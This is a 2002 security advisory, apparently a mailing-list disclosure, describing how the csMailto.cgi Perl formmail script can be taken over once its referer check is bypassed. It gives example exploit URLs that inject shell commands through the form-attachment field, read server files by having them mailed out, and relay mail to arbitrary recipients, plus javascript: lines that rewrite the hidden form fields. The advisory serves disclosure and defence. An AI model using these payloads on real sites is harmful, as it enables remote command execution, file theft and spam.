Name : CGIscript.net - csMailto.cgi - Remote
Command Execution
Date : April 23, 2002
Product : csMailto
Vuln Type : Access Validation Error
Severity : HIGH RISK
Vendor : WWW.CGIscript.NET, LLC.
Homepage : http://www.cgiscript.net/
csMailto is a perl cgi formmail script developed by
Mike Barone and Andy Angrick of CGIscript.net. From
the website "(csMailto is) an automated script that
allows the user to build and manage multiple mailto
forms to use within your web site. Build your own
mailto forms without having to learn Perl. It also can
send and receive files!".
The script stores all its configuration data in hidden
form fields, relying on the user to accurately (and
honestly) echo that information back with each form
submission. The only thing allowing a user from
having complete control over the script is a referer
check which is easily bypassed.
Because of this and other problems, the script is
subject to the following attacks:
Because the script stored all the form configuration
data in hidden fields in the actual form, once a user
can bypass the referrer check they can essentially do
anything an administrator of the program could do,
plus some additional things that probably weren't
intended.
The script doesn't even check for the full referrer,
it only checks for the presence of the server hostname
in the referral your send. For example, if the script
is http://host.com/cgi-script/CSMailto/CSMailto.cgi
then it will look for "host.com" in the referer.
This method is inherently insecure and can be bypassed
by:
Creating a perl LWP script which could specify an
arbitrary referrer.
Using javascript or other means to modify the form
values on the generated CSMailto form and allowing the
browser to send the original (and valid) URL as a
referrer.
Creating a local form page with the target hostname
in the path and thus the referrer that is sent when in
the form is submitted (eg: C:\html\host.com\form.html)
Creating a local html page with a simple link (see
below) and the target hostname in the path and thus in
the referrer that is sent when the link is clicked
(eg: C:\html\host.com.html)
Some example exploits are as follows. Note, these all
assume that the referrer check was bypassed with one
of the above methods.
CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&command=mailform
CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&[email protected]&form-autoresponse=YES&command=mailform
CSMailto.cgi?form-attachment=FILEPATH_HERE&[email protected]&form-autoresponse=YES&command=mailform
download/access form input (no referer check)
CSMailto has the option to "have the feedback
exported to an external file". These files
are stored in CSV format and can be downloaded from:
CSMailto/export/FORM_NAME.csv
Form HTML files are often named after their form
names and the information is also stored in hidden
fields in the actual form like so
"β¦formname=FORM_NAMEβ¦". Also, it's worth noting
that the script doesn't properly escape '"', ',', or
nextline ("\n") chars, so any CSV data with those
characters may get corrupted.
use form to send email to anyone
[email protected]&[email protected]&form-subject=subject&form-results=body&command=mailform
Another example of the seriousness of this problem, as
mentioned above, you can simply load an existing
CSMailto form and have your browser (IE in this
example) change some of the preset hidden form values
and then click submit. Example:
javascript:alert(document.forms[0]["form-attachment"].value="FILEPATH");
javascript:alert(document.forms[0]["form-autoresponse"].value="YES");
javascript:alert(document.forms[0]["Email"].value="[email protected]");
Because of the high number of users who are using
CGIscript.net scripts (over 17,000 csSearch users
alone according to the website) and the fact that
search engines can easily be used to identify sites
with the unique "csMailto.cgi" script name, the risk
posed by these flaws is very high indeed.
Vendor was notified on Apr 5, 2002 of the problem but
has not yet released a fix.
Affected parties may want to consider switching to a
free replacement such as
"nms formmail" which can be found at
http://nms-cgi.sourceforge.net/scripts.shtml
April 8, 2002 - csGuestbook.cgi, csLiveSupport.cgi,
csNewsPro.cgi, csChatRBox.cgi - Remote Code Execution
http://online.securityfocus.com/archive/1/266432
March 25, 2002 - csSearch.cgi - Remote Code Execution
http://online.securityfocus.com/archive/1/264169
The information within this document may change
without notice. Use of this information constitutes
acceptance for use in an AS IS condition. There are NO
warranties with regard to this information. In no
event shall the author be liable for any consequences
whatsoever arising out of or in connection with the
use or spread of this information. Any use of this
information lays within the user's responsibility.
If anyone has any other CGIscript.net scripts they'd
like me to take a look at, just drop me a line at
[email protected].
Do You Yahoo!?
Yahoo! Games - play chess, backgammon, pool and more
http://games.yahoo.com/